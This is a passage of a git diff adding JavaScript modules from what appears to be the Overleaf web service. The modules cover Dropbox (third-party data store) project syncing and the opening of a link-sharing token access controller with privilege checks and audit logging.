projectId = req.params.project_id + const path = `/${req.params[0]}` // UpdateMerger expects leading slash + const source = req.headers['x-update-source'] || 'unknown' + + const entityId = await UpdateMerger.promises.deleteUpdate( + null, + projectId, + path, + source + ) + res.json({ entityId }) +} + +async function getQueues(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + res.json(await TpdsQueueManager.promises.getQueues(userId)) +} + +function parseParams(req) { + const userId = req.params.user_id + const projectId = req.params.project_id + const { projectName, filePath } = splitPath(projectId, req.params[0]) + return { filePath, userId, projectName, projectId } +} + +function splitPath(projectId, path) { + let filePath, projectName + path = Path.join('/', path) + if (projectId) { + filePath = path + projectName = '' + } else if (path.substring(1).indexOf('/') === -1) { + filePath = '/' + projectName = path.substring(1) + } else { + filePath = path.substring(path.indexOf('/', 1)) + projectName = path.substring(0, path.indexOf('/', 1)) + projectName = projectName.replace('/', '') + } + + return { filePath, projectName } +} + +export default { + createProject: expressify(createProject), + mergeUpdate: expressify(mergeUpdate), + deleteUpdate: expressify(deleteUpdate), + updateFolder: expressify(updateFolder), + updateProjectContents: expressify(updateProjectContents), + deleteProjectContents: expressify(deleteProjectContents), + getQueues: expressify(getQueues), + + promises: { + deleteProjectContents, + updateProjectContents, + }, + + // for tests only + parseParams, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js b/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js new file mode 100644 index 0000000..5565571 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsProjectFlusher.js @@ -0,0 +1,117 @@ +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const DocumentUpdaterHandler = require('../DocumentUpdater/DocumentUpdaterHandler') +const ProjectGetter = require('../Project/ProjectGetter') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const { Project } = require('../../models/Project') +const TpdsUpdateSender = require('./TpdsUpdateSender') +const OError = require('@overleaf/o-error') + +module.exports = { + flushProjectToTpds: callbackify(flushProjectToTpds), + deferProjectFlushToTpds: callbackify(deferProjectFlushToTpds), + flushProjectToTpdsIfNeeded: callbackify(flushProjectToTpdsIfNeeded), + promises: { + flushProjectToTpds, + deferProjectFlushToTpds, + flushProjectToTpdsIfNeeded, + }, +} + +/** + * Flush a complete project to the TPDS. + */ +async function flushProjectToTpds(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + name: true, + deferredTpdsFlushCounter: true, + 'overleaf.history.id': 1, + }) + await _flushProjectToTpds(project) +} + +/** + * Flush a project to TPDS if a flush is pending. This is called when + * projects are loaded in the editor and triggers a sync to dropbox for + * projects that were imported from Overleaf v1. + */ +async function flushProjectToTpdsIfNeeded(projectId) { + const project = await ProjectGetter.promises.getProject(projectId, { + name: true, + deferredTpdsFlushCounter: true, + 'overleaf.history.id': 1, + }) + if (project.deferredTpdsFlushCounter > 0) { + await _flushProjectToTpds(project) + } +} + +async function _flushProjectToTpds(project) { + const historyId = project?.overleaf?.history?.id + if (!historyId) { + const projectId = project._id + throw new OError('project does not have a history id', { projectId }) + } + logger.debug({ projectId: project._id }, 'flushing project to TPDS') + logger.debug({ projectId: project._id }, 'finished flushing project to TPDS') + await DocumentUpdaterHandler.promises.flushProjectToMongo(project._id) + const [docs, files] = await Promise.all([ + ProjectEntityHandler.promises.getAllDocs(project._id), + ProjectEntityHandler.promises.getAllFiles(project._id), + ]) + for (const [docPath, doc] of Object.entries(docs)) { + await TpdsUpdateSender.promises.addDoc({ + projectId: project._id, + docId: doc._id, + path: docPath, + projectName: project.name, + rev: doc.rev || 0, + folderId: doc.folder._id, + }) + } + for (const [filePath, file] of Object.entries(files)) { + await TpdsUpdateSender.promises.addFile({ + projectId: project._id, + historyId, + fileId: file._id, + hash: file.hash, + path: filePath, + projectName: project.name, + rev: file.rev, + folderId: file.folder._id, + }) + } + await _resetDeferredTpdsFlushCounter(project) +} + +/** + * Reset the TPDS pending flush counter. + * + * To avoid concurrency problems, the flush counter is not reset if it has been + * incremented since we fetched it from the database. + */ +async function _resetDeferredTpdsFlushCounter(project) { + if (project.deferredTpdsFlushCounter > 0) { + await Project.updateOne( + { + _id: project._id, + deferredTpdsFlushCounter: { $lte: project.deferredTpdsFlushCounter }, + }, + { $set: { deferredTpdsFlushCounter: 0 } } + ).exec() + } +} + +/** + * Mark a project as pending a flush to TPDS. + * This was called as part of the import process for Overleaf v1 projects. + * We no longer use this method, but imported v1 projects have the + * deferredTpdsFlushCounter set and will trigger a flush when loaded in + * the editor. + */ +async function deferProjectFlushToTpds(projectId) { + await Project.updateOne( + { _id: projectId }, + { $inc: { deferredTpdsFlushCounter: 1 } } + ).exec() +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs new file mode 100644 index 0000000..253d0f0 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsQueueManager.mjs @@ -0,0 +1,17 @@ +import Settings from '@overleaf/settings' +import OError from '@overleaf/o-error' +import { fetchJson } from '@overleaf/fetch-utils' + +async function getQueues(userId) { + try { + return await fetchJson(`${Settings.apis.tpdsworker.url}/queues/${userId}`) + } catch (err) { + throw OError.tag(err, 'failed to query TPDS queues for user', { userId }) + } +} + +export default { + promises: { + getQueues, + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs new file mode 100644 index 0000000..219db88 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateHandler.mjs @@ -0,0 +1,205 @@ +import { callbackify } from 'node:util' +import UpdateMerger from './UpdateMerger.js' +import logger from '@overleaf/logger' +import NotificationsBuilder from '../Notifications/NotificationsBuilder.js' +import ProjectCreationHandler from '../Project/ProjectCreationHandler.js' +import ProjectDeleter from '../Project/ProjectDeleter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import ProjectHelper from '../Project/ProjectHelper.js' +import ProjectRootDocManager from '../Project/ProjectRootDocManager.js' +import FileTypeManager from '../Uploads/FileTypeManager.js' +import CooldownManager from '../Cooldown/CooldownManager.js' +import Errors from '../Errors/Errors.js' +import Modules from '../../infrastructure/Modules.js' + +async function newUpdate( + userId, + projectId, + projectName, + path, + updateRequest, + source +) { + const project = await getOrCreateProject(userId, projectId, projectName) + if (project == null) { + return null + } + + const projectIsOnCooldown = + await CooldownManager.promises.isProjectOnCooldown(project._id) + if (projectIsOnCooldown) { + throw new Errors.TooManyRequestsError('project on cooldown') + } + + const shouldIgnore = await FileTypeManager.promises.shouldIgnore(path) + if (shouldIgnore) { + return null + } + + const metadata = await UpdateMerger.promises.mergeUpdate( + userId, + project._id, + path, + updateRequest, + source + ) + return metadata +} + +async function deleteUpdate(userId, projectId, projectName, path, source) { + logger.debug({ userId, filePath: path }, 'handling delete update from tpds') + let projects = [] + if (projectId) { + const project = await findProjectByIdWithRWAccess(userId, projectId) + if (project) { + projects = [project] + } + } else { + projects = await ProjectGetter.promises.findUsersProjectsByName( + userId, + projectName + ) + } + const activeProjects = projects.filter( + project => !ProjectHelper.isArchivedOrTrashed(project, userId) + ) + + if (activeProjects.length === 0) { + logger.debug( + { userId, filePath: path, projectName }, + 'project not found from tpds update, ignoring folder or project' + ) + return + } + + if (projects.length > 1) { + // There is more than one project with that name, and one of them is + // active (previous condition) + await handleDuplicateProjects(userId, projectName) + return + } + + const project = activeProjects[0] + if (path === '/') { + logger.debug( + { userId, filePath: path, projectName, projectId: project._id }, + 'project found for delete update, path is root so marking project as deleted' + ) + await ProjectDeleter.promises.markAsDeletedByExternalSource(project._id) + } else { + await UpdateMerger.promises.deleteUpdate(userId, project._id, path, source) + } +} + +async function getOrCreateProject(userId, projectId, projectName) { + if (projectId) { + return findProjectByIdWithRWAccess(userId, projectId) + } else { + return getOrCreateProjectByName(userId, projectName) + } +} + +async function findProjectByIdWithRWAccess(userId, projectId) { + const allProjects = await ProjectGetter.promises.findAllUsersProjects( + userId, + 'name archived trashed' + ) + for (const projects of [allProjects.owned, allProjects.readAndWrite]) { + for (const project of projects) { + if (project._id.toString() === projectId) { + return project + } + } + } +} + +async function getOrCreateProjectByName(userId, projectName) { + const projects = await ProjectGetter.promises.findUsersProjectsByName( + userId, + projectName + ) + + if (projects.length === 0) { + // No project with that name -- active, archived or trashed -- has been + // found. Create one. + const project = await ProjectCreationHandler.promises.createBlankProject( + userId, + projectName + ) + + // have a crack at setting the root doc after a while, on creation + // we won't have it yet, but should have been sent it it within 30 + // seconds + ProjectRootDocManager.setRootDocAutomaticallyInBackground(project._id) + return project + } + + const activeProjects = projects.filter( + project => !ProjectHelper.isArchivedOrTrashed(project, userId) + ) + if (activeProjects.length === 0) { + // All projects with that name are archived or trashed. Ignore. + return null + } + + if (projects.length > 1) { + // There is more than one project with that name, and one of them is + // active (previous condition) + await handleDuplicateProjects(userId, projectName) + return null + } + + return activeProjects[0] +} + +async function handleDuplicateProjects(userId, projectName) { + await Modules.promises.hooks.fire( + 'removeDropbox', + userId, + 'duplicate-projects' + ) + await NotificationsBuilder.promises + .dropboxDuplicateProjectNames(userId) + .create(projectName) +} + +async function createFolder(userId, projectId, projectName, path) { + const project = await getOrCreateProject(userId, projectId, projectName) + if (project == null) { + return null + } + + const projectIsOnCooldown = + await CooldownManager.promises.isProjectOnCooldown(project._id) + if (projectIsOnCooldown) { + throw new Errors.TooManyRequestsError('project on cooldown') + } + + const shouldIgnore = await FileTypeManager.promises.shouldIgnore(path) + if (shouldIgnore) { + return null + } + + const folder = await UpdateMerger.promises.createFolder( + project._id, + path, + userId + ) + return { + folderId: folder._id, + parentFolderId: folder.parentFolder_id, + projectId: project._id, + path, + } +} + +export default { + newUpdate: callbackify(newUpdate), + deleteUpdate: callbackify(deleteUpdate), + createFolder: callbackify(createFolder), + promises: { + newUpdate, + deleteUpdate, + createFolder, + }, +} diff --git a/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js new file mode 100644 index 0000000..2aacc90 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/TpdsUpdateSender.js @@ -0,0 +1,294 @@ +const { ObjectId } = require('mongodb-legacy') +const _ = require('lodash') +const { callbackify } = require('util') +const logger = require('@overleaf/logger') +const metrics = require('@overleaf/metrics') +const Path = require('path') +const { fetchNothing } = require('@overleaf/fetch-utils') +const settings = require('@overleaf/settings') +const HistoryURLHelper = require('../History/HistoryURLHelper') + +const CollaboratorsGetter = + require('../Collaborators/CollaboratorsGetter').promises +const UserGetter = require('../User/UserGetter').promises + +const tpdsUrl = _.get(settings, ['apis', 'thirdPartyDataStore', 'url']) + +async function addDoc(params) { + metrics.inc('tpds.add-doc') + const { projectId, path, docId, projectName, rev, folderId } = params + + const streamOrigin = + settings.apis.docstore.pubUrl + + Path.join(`/project/${projectId}`, `/doc/${docId}`, '/raw') + + await addEntity({ + projectId, + path, + projectName, + rev, + folderId, + streamOrigin, + entityId: docId, + entityType: 'doc', + }) +} + +async function addEntity(params) { + const { + projectId, + path, + projectName, + rev, + folderId, + streamOrigin, + streamFallback, + entityId, + entityType, + } = params + + const projectUserIds = await getProjectUsersIds(projectId) + + for (const userId of projectUserIds) { + const job = { + method: 'post', + headers: { + 'x-entity-id': entityId, + 'x-entity-rev': rev, + 'x-entity-type': entityType, + 'x-folder-id': folderId, + 'x-project-id': projectId, + }, + uri: buildTpdsUrl(userId, projectName, path), + title: 'addFile', + streamOrigin, + streamFallback, + } + + await enqueue(userId, 'pipeStreamFrom', job) + } +} + +async function addFile(params) { + metrics.inc('tpds.add-file') + const { + projectId, + historyId, + fileId, + hash, + path, + projectName, + rev, + folderId, + } = params + // Go through project-history to avoid the need for handling history-v1 authentication. + const { url, fallbackURL } = + HistoryURLHelper.projectHistoryURLWithFilestoreFallback( + settings, + projectId, + historyId, + { _id: fileId, hash }, + 'tpdsAddFile' + ) + + await addEntity({ + projectId, + path, + projectName, + rev, + folderId, + streamOrigin: url, + streamFallback: fallbackURL, + entityId: fileId, + entityType: 'file', + }) +} + +function buildMovePaths(params) { + if (params.newProjectName) { + return { + startPath: Path.join('/', params.projectName, '/'), + endPath: Path.join('/', params.newProjectName, '/'), + } + } else { + return { + startPath: Path.join('/', params.projectName, '/', params.startPath), + endPath: Path.join('/', params.projectName, '/', params.endPath), + } + } +} + +function buildTpdsUrl(userId, projectName, filePath) { + const projectPath = encodeURIComponent(Path.join(projectName, '/', filePath)) + return `${tpdsUrl}/user/${userId}/entity/${projectPath}` +} + +async function deleteEntity(params) { + metrics.inc('tpds.delete-entity') + const { + projectId, + path, + projectName, + entityId, + entityType, + subtreeEntityIds, + } = params + + const projectUserIds = await getProjectUsersIds(projectId) + + for (const userId of projectUserIds) { + const job = { + method: 'delete', + headers: { + 'x-entity-id': entityId, + 'x-entity-type': entityType, + 'x-project-id': projectId, + }, + uri: buildTpdsUrl(userId, projectName, path), + // We're sending a body with the DELETE request. This is unconventional, + // but Express does handle it on the other side. Ideally, this operation + // would be moved to a POST endpoint. + json: { subtreeEntityIds }, + title: 'deleteEntity', + } + + await enqueue(userId, 'standardHttpRequest', job) + } +} + +async function createProject(params) { + if (!tpdsUrl) return // Overleaf Community Edition/Server Pro + + const { projectId, projectName, userId } = params + + const job = { + method: 'post', + headers: { + 'x-project-id': projectId, + }, + uri: Path.join( + tpdsUrl, + 'user', + userId.toString(), + 'project', + 'new', + encodeURIComponent(projectName) + ), + title: 'createProject', + } + + await enqueue(userId, 'standardHttpRequest', job) +} + +async function enqueue(group, method, job) { + const tpdsWorkerUrl = _.get(settings, ['apis', 'tpdsworker', 'url']) + // silently do nothing if worker url is not in settings + if (!tpdsWorkerUrl) { + return + } + try { + const url = new URL('/enqueue/web_to_tpds_http_requests', tpdsWorkerUrl) + await fetchNothing(url, { + method: 'POST', + json: { group, job, method }, + signal: AbortSignal.timeout(5 * 1000), + }) + } catch (err) { + // log error and continue + logger.error({ err, group, job, method }, 'error enqueueing tpdsworker job') + } +} + +async function getProjectUsersIds(projectId) { + // get list of all user ids with access to project. project owner + // will always be the first entry in the list. + const userIds = await CollaboratorsGetter.getInvitedMemberIds(projectId) + // filter invited users to only return those with dropbox linked + const dropboxUsers = await UserGetter.getUsers( + { + _id: { $in: userIds.map(id => new ObjectId(id)) }, + 'dropbox.access_token.uid': { $ne: null }, + }, + { + _id: 1, + } + ) + const dropboxUserIds = dropboxUsers.map(user => user._id) + return dropboxUserIds +} + +async function moveEntity(params) { + metrics.inc('tpds.move-entity') + const { projectId, rev, entityId, entityType, folderId } = params + + const projectUserIds = await getProjectUsersIds(projectId) + const { endPath, startPath } = buildMovePaths(params) + + for (const userId of projectUserIds) { + const headers = { + 'x-project-id': projectId, + 'x-entity-rev': rev, + } + if (entityId != null) { + headers['x-entity-id'] = entityId + } + if (entityType != null) { + headers['x-entity-type'] = entityType + } + if (folderId != null) { + headers['x-folder-id'] = folderId + } + const job = { + method: 'put', + title: 'moveEntity', + uri: `${tpdsUrl}/user/${userId}/entity`, + headers, + json: { + user_id: userId, + endPath, + startPath, + }, + } + + await enqueue(userId, 'standardHttpRequest', job) + } +} + +async function pollDropboxForUser(userId) { + metrics.inc('tpds.poll-dropbox') + + const job = { + method: 'post', + uri: `${tpdsUrl}/user/poll`, + json: { + user_ids: [userId], + }, + } + + // Queue poll requests in the user queue along with file updates, in order + // to avoid race conditions between polling and updates. + await enqueue(userId, 'standardHttpRequest', job) +} + +const TpdsUpdateSender = { + addDoc: callbackify(addDoc), + addEntity: callbackify(addEntity), + addFile: callbackify(addFile), + deleteEntity: callbackify(deleteEntity), + createProject: callbackify(createProject), + enqueue: callbackify(enqueue), + moveEntity: callbackify(moveEntity), + pollDropboxForUser: callbackify(pollDropboxForUser), + promises: { + addDoc, + addEntity, + addFile, + deleteEntity, + createProject, + enqueue, + moveEntity, + pollDropboxForUser, + }, +} + +module.exports = TpdsUpdateSender diff --git a/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js b/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js new file mode 100644 index 0000000..f68d366 --- /dev/null +++ b/services/web/app/src/Features/ThirdPartyDataStore/UpdateMerger.js @@ -0,0 +1,199 @@ +const { callbackify } = require('util') +const _ = require('lodash') +const fsPromises = require('fs/promises') +const fs = require('fs') +const logger = require('@overleaf/logger') +const EditorController = require('../Editor/EditorController') +const FileTypeManager = require('../Uploads/FileTypeManager') +const ProjectEntityHandler = require('../Project/ProjectEntityHandler') +const crypto = require('crypto') +const Settings = require('@overleaf/settings') +const { pipeline } = require('stream/promises') + +async function mergeUpdate(userId, projectId, path, updateRequest, source) { + const fsPath = await writeUpdateToDisk(projectId, updateRequest) + + try { + // note: important to await here so file reading finishes before cleaning up below + return await _mergeUpdate(userId, projectId, path, fsPath, source) + } finally { + // note: not awaited or thrown + fsPromises.unlink(fsPath).catch(err => { + logger.err({ err, projectId, fsPath }, 'error deleting file') + }) + } +} + +async function writeUpdateToDisk(projectId, updateStream) { + const fsPath = `${ + Settings.path.dumpFolder + }/${projectId}_${crypto.randomUUID()}` + const writeStream = fs.createWriteStream(fsPath) + try { + await pipeline(updateStream, writeStream) + } catch (err) { + try { + await fsPromises.unlink(fsPath) + } catch (err) { + logger.error({ err, projectId, fsPath }, 'error deleting file') + } + throw err + } + return fsPath +} + +async function _findExistingFileType(projectId, path) { + const { docs, files } = + await ProjectEntityHandler.promises.getAllEntities(projectId) + if (_.some(docs, d => d.path === path)) { + return 'doc' + } + if (_.some(files, f => f.path === path)) { + return 'file' + } + return null +} + +async function _determineFileType(projectId, path, fsPath) { + // check if there is an existing file with the same path (we either need + // to overwrite it or delete it) + const existingFileType = await _findExistingFileType(projectId, path) + + // determine whether the update should create a doc or binary file + const { binary, encoding } = await FileTypeManager.promises.getType( + path, + fsPath, + existingFileType + ) + + // If we receive a non-utf8 encoding, we won't be able to keep things in + // sync, so we'll treat non-utf8 files as binary + const isBinary = binary || encoding !== 'utf-8' + + // Existing | Update | Resulting file type + // ---------|-----------|-------------------- + // file | isBinary | file + // file | !isBinary | file + // doc | isBinary | file + // doc | !isBinary | doc + // null | isBinary | file + // null | !isBinary | doc + + // if a binary file already exists, always keep it as a binary file + // even if the update looks like a text file + if (existingFileType === 'file') { + return 'file' + } else { + return isBinary ? 'file' : 'doc' + } +} + +async function _mergeUpdate(userId, projectId, path, fsPath, source) { + const fileType = await _determineFileType(projectId, path, fsPath) + + if (fileType === 'file') { + const { file, folder } = await _processFile( + projectId, + fsPath, + path, + source, + userId + ) + return { + projectId, + entityType: 'file', + entityId: file._id, + rev: file.rev, + folderId: folder._id, + } + } else if (fileType === 'doc') { + const { doc, folder } = await _processDoc( + projectId, + userId, + fsPath, + path, + source + ) + return { + projectId, + entityType: 'doc', + entityId: doc._id, + rev: doc.rev, + folderId: folder._id, + } + } else { + throw new Error('unrecognized file') + } +} + +async function deleteUpdate(userId, projectId, path, source) { + try { + return await EditorController.promises.deleteEntityWithPath( + projectId, + path, + source, + userId + ) + } catch (err) { + logger.warn( + { err, userId, projectId, path, source }, + 'failed to delete entity' + ) + } +} + +async function _processDoc(projectId, userId, fsPath, path, source) { + const docLines = await _readFileIntoTextArray(fsPath) + logger.debug({ docLines }, 'processing doc update from tpds') + const doc = await EditorController.promises.upsertDocWithPath( + projectId, + path, + docLines, + source, + userId + ) + return doc +} + +async function _processFile(projectId, fsPath, path, source, userId) { + const { file, folder } = await EditorController.promises.upsertFileWithPath( + projectId, + path, + fsPath, + null, + source, + userId + ) + return { file, folder } +} + +async function _readFileIntoTextArray(path) { + let content = await fsPromises.readFile(path, 'utf8') + if (content == null) { + content = '' + } + const lines = content.split(/\r\n|\n|\r/) + return lines +} + +async function createFolder(projectId, path, userId) { + const { lastFolder: folder } = await EditorController.promises.mkdirp( + projectId, + path, + userId + ) + return folder +} + +module.exports = { + mergeUpdate: callbackify(mergeUpdate), + _mergeUpdate: callbackify(_mergeUpdate), + deleteUpdate: callbackify(deleteUpdate), + createFolder: callbackify(createFolder), + promises: { + mergeUpdate, + _mergeUpdate, // called by GitBridgeHandler + deleteUpdate, + createFolder, + }, +} diff --git a/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs b/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs new file mode 100644 index 0000000..ff4b93e --- /dev/null +++ b/services/web/app/src/Features/TokenAccess/TokenAccessController.mjs @@ -0,0 +1,602 @@ +import AuthenticationController from '../Authentication/AuthenticationController.js' +import SessionManager from '../Authentication/SessionManager.js' +import TokenAccessHandler from './TokenAccessHandler.js' +import Errors from '../Errors/Errors.js' +import logger from '@overleaf/logger' +import OError from '@overleaf/o-error' +import { expressify } from '@overleaf/promise-utils' +import AuthorizationManager from '../Authorization/AuthorizationManager.js' +import PrivilegeLevels from '../Authorization/PrivilegeLevels.js' +import ProjectAuditLogHandler from '../Project/ProjectAuditLogHandler.js' +import CollaboratorsInviteHandler from '../Collaborators/CollaboratorsInviteHandler.mjs' +import CollaboratorsHandler from '../Collaborators/CollaboratorsHandler.js' +import EditorRealTimeController from '../Editor/EditorRealTimeController.js' +import CollaboratorsGetter from '../Collaborators/CollaboratorsGetter.js' +import ProjectGetter from '../Project/ProjectGetter.js' +import AsyncFormHelper from '../Helpers/AsyncFormHelper.js' +import AnalyticsManager from '../Analytics/AnalyticsManager.js' +import { canRedirectToAdminDomain } from '../Helpers/AdminAuthorizationHelper.js' +import { getSafeAdminDomainRedirect } from '../Helpers/UrlHelper.js' +import UserGetter from '../User/UserGetter.js' +import Settings from '@overleaf/settings' +import LimitationsManager from '../Subscription/LimitationsManager.js' + +const orderedPrivilegeLevels = [ + PrivilegeLevels.NONE, + PrivilegeLevels.READ_ONLY, + PrivilegeLevels.REVIEW, + PrivilegeLevels.READ_AND_WRITE, + PrivilegeLevels.OWNER, +] + +async function _userAlreadyHasHigherPrivilege(userId, projectId, tokenType) { + if (!Object.values(TokenAccessHandler.TOKEN_TYPES).includes(tokenType)) { + throw new Error('bad token type') + } + if (!userId) { + return false + } + const privilegeLevel = + await AuthorizationManager.promises.getPrivilegeLevelForProject( + userId, + projectId + ) + return ( + orderedPrivilegeLevels.indexOf(privilegeLevel) >= + orderedPrivilegeLevels.indexOf(tokenType) + ) +} + +const makePostUrl = token => { + if (TokenAccessHandler.isReadAndWriteToken(token)) { + return `/${token}/grant` + } else if (TokenAccessHandler.isReadOnlyToken(token)) { + return `/read/${token}/grant` + } else { + throw new Error('invalid token type') + } +} + +async function _handleV1Project(token, userId) { + if (!userId) { + return { v1Import: { status: 'mustLogin' } } + } else { + const docInfo = await TokenAccessHandler.promises.getV1DocInfo( + token, + userId + ) + // This should not happen anymore, but it does show + // a nice "contact support" message, so it can stay + if (!docInfo) { + return { v1Import: { status: 'cannotImport' } } + } + if (!docInfo.exists) { + return null + } + if (docInfo.exported) { + return null + } + return { + v1Import: { + status: 'canDownloadZip', + projectId: token, + hasOwner: docInfo.has_owner, + name: docInfo.name || 'Untitled', + brandInfo: docInfo.brand_info, + }, + } + } +} + +async function _isOverleafStaff(userId) { + const emails = await UserGetter.promises.getUserConfirmedEmails(userId) + const adminDomains = Settings.adminDomains ?? [] + return emails.some(email => + adminDomains.some(adminDomain => email.email.endsWith(`@${adminDomain}`)) + ) +} + +async function tokenAccessPage(req, res, next) { + const { token } = req.params + if (!TokenAccessHandler.isValidToken(token)) { + return next(new Errors.NotFoundError()) + } + + try { + if (TokenAccessHandler.isReadOnlyToken(token)) { + const docPublishedInfo = + await TokenAccessHandler.promises.getV1DocPublishedInfo(token) + if (docPublishedInfo.allow === false) { + return res.redirect(302, docPublishedInfo.published_path) + } + } + + res.render('project/token/access-react', { + postUrl: makePostUrl(token), + }) + } catch (err) { + return next( + OError.tag(err, 'error while rendering token access page', { token }) + ) + } +} + +async function checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next +) { + const isAnonymousUser = !userId + if ( + isAnonymousUser && + tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE && + !TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED + ) { + logger.warn('[TokenAccess] deny anonymous read-and-write token access') + + let projectUrlWithToken = TokenAccessHandler.makeTokenUrl(token) + + if (tokenHashPrefix && tokenHashPrefix.startsWith('#')) { + projectUrlWithToken += `${tokenHashPrefix}` + } + + AuthenticationController.setRedirectInSession(req, projectUrlWithToken) + return [ + null, + () => { + res.json({ + redirect: '/restricted', + anonWriteAccessDenied: true, + }) + }, + { action: 'denied anonymous read-and-write token access' }, + ] + } + + // Try to get the project, and/or an alternative action to take. + // Returns a tuple of [project, action] + const project = await TokenAccessHandler.promises.getProjectByToken( + tokenType, + token + ) + if (!project) { + if (Settings.overleaf) { + const v1ImportData = await _handleV1Project(token, userId) + return [ + null, + () => { + if (v1ImportData) { + res.json(v1ImportData) + } else { + res.sendStatus(404) + } + }, + { action: v1ImportData ? 'import v1' : '404' }, + ] + } else { + return [null, null, { action: '404' }] + } + } + + const projectId = project._id + + const tokenAccessEnabled = + TokenAccessHandler.tokenAccessEnabledForProject(project) + if (isAnonymousUser && tokenAccessEnabled) { + if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE) { + if (TokenAccessHandler.ANONYMOUS_READ_AND_WRITE_ENABLED) { + logger.debug({ projectId }, 'granting read-write anonymous access') + TokenAccessHandler.grantSessionTokenAccess(req, projectId, token) + return [ + null, + () => { + res.json({ + redirect: `/project/${projectId}`, + grantAnonymousAccess: tokenType, + }) + }, + { projectId, action: 'granting read-write anonymous access' }, + ] + } else { + // anonymous read-and-write token access should have been denied already + throw new Error( + 'unreachable: anonymous read-and-write token access bug' + ) + } + } else if (tokenType === TokenAccessHandler.TOKEN_TYPES.READ_ONLY) { + logger.debug({ projectId }, 'granting read-only anonymous access') + TokenAccessHandler.grantSessionTokenAccess(req, projectId, token) + return [ + null, + () => { + res.json({ + redirect: `/project/${projectId}`, + grantAnonymousAccess: tokenType, + }) + }, + { projectId, action: 'granting read-only anonymous access' }, + ] + } else { + throw new Error('unreachable') + } + } + const userHasPrivilege = await _userAlreadyHasHigherPrivilege( + userId, + projectId, + tokenType + ) + if (userHasPrivilege) { + return [ + null, + () => { + res.json({ redirect: `/project/${project._id}`, higherAccess: true }) + }, + { projectId, action: 'user already has higher or same privilege' }, + ] + } + + // Handle admin redirect + // If the project owner is an internal staff (using @overleaf.com email), + // the admin will join the project "for real". + // If the project owner is a external user + // the admin will be redirect to admin domain to view the project. + if (canRedirectToAdminDomain(SessionManager.getSessionUser(req.session))) { + const isProjectOwnerOverleafStaff = await _isOverleafStaff( + project.owner_ref + ) + if (isProjectOwnerOverleafStaff) { + logger.warn( + { projectId, userId }, + 'letting admin user join staff project' + ) + } else { + let projectUrlWithToken = TokenAccessHandler.makeTokenUrl(token) + if (tokenHashPrefix && tokenHashPrefix.startsWith('#')) { + projectUrlWithToken += `${tokenHashPrefix}` + } + return [ + null, + () => + res.json({ + redirect: getSafeAdminDomainRedirect(projectUrlWithToken), + }), + { projectId, action: 'redirect admin user to admin domain' }, + ] + } + } + + if (!tokenAccessEnabled) { + return [ + null, + () => { + next(new Errors.NotFoundError()) + }, + { projectId, action: 'token access not enabled' }, + ] + } + return [project, null, { projectId, action: 'continue' }] +} + +async function grantTokenAccessReadAndWrite(req, res, next) { + const { token } = req.params + const { confirmedByUser, tokenHashPrefix } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + if (!TokenAccessHandler.isReadAndWriteToken(token)) { + return res.sendStatus(400) + } + const tokenType = TokenAccessHandler.TOKEN_TYPES.READ_AND_WRITE + + try { + const [project, action, logData] = await checkAndGetProjectOrResponseAction( + tokenType, + token, + userId, + tokenHashPrefix, + req, + res, + next + ) + + TokenAccessHandler.checkTokenHashPrefix( + token, + tokenHashPrefix, + tokenType, + userId, + logData + ) + + if (action) { + return action() + } + if (!project) { + return next(new Errors.NotFoundError()) + } + + if (!confirmedByUser) { + return res.json({ + requireAccept: { + projectName: project.name, + }, + }) + } + + const pendingEditor = + !(await LimitationsManager.promises.canAcceptEditCollaboratorInvite( + project._id + )) + await ProjectAuditLogHandler.promises.addEntry( + project._id, + 'accept-via-link-sharing', + userId, + req.ip, + { + privileges: pendingEditor ? 'readOnly' : 'readAndWrite', + ...(pendingEditor && { pendingEditor: true }), + } + ) + AnalyticsManager.recordEventForUserInBackground(userId, 'project-joined', { + role: pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + ownerId: project.owner_ref.toString(), + source: 'link-sharing', + mode: pendingEditor ? 'view' : 'edit', + projectId: project._id.toString(), + ...(pendingEditor && { pendingEditor: true }), + }) + await CollaboratorsHandler.promises.addUserIdToProject( + project._id, + undefined, + userId, + pendingEditor + ? PrivilegeLevels.READ_ONLY + : PrivilegeLevels.READ_AND_WRITE, + { pendingEditor } + ) + + // remove pending invite and notification + const userEmails = await UserGetter.promises.getUserConfirmedEmails(userId) + await CollaboratorsInviteHandler.promises.revokeInviteForUser( + project._id, + userEmails + ) + // Should be a noop if the user is already a member, + // and would redirect transparently into the project. + EditorRealTimeController.emitToRoom( + project._id, + 'project:membership:changed', + { members: true, invites: true } + ) + + return res.json({ + redirect: `/project/${project._id}`, + }) + } catch (err) { + return next( + OError.tag( + err, + 'error while trying to grant read-and-write token access', + { token } + ) + ) + } +} + +async function grantTokenAccessReadOnly(req, res, next) { + const { token } = req.params + const { confirmedByUser, tokenHashPrefix } = req.body + const userId = SessionManager.getLoggedInUserId(req.session) + if 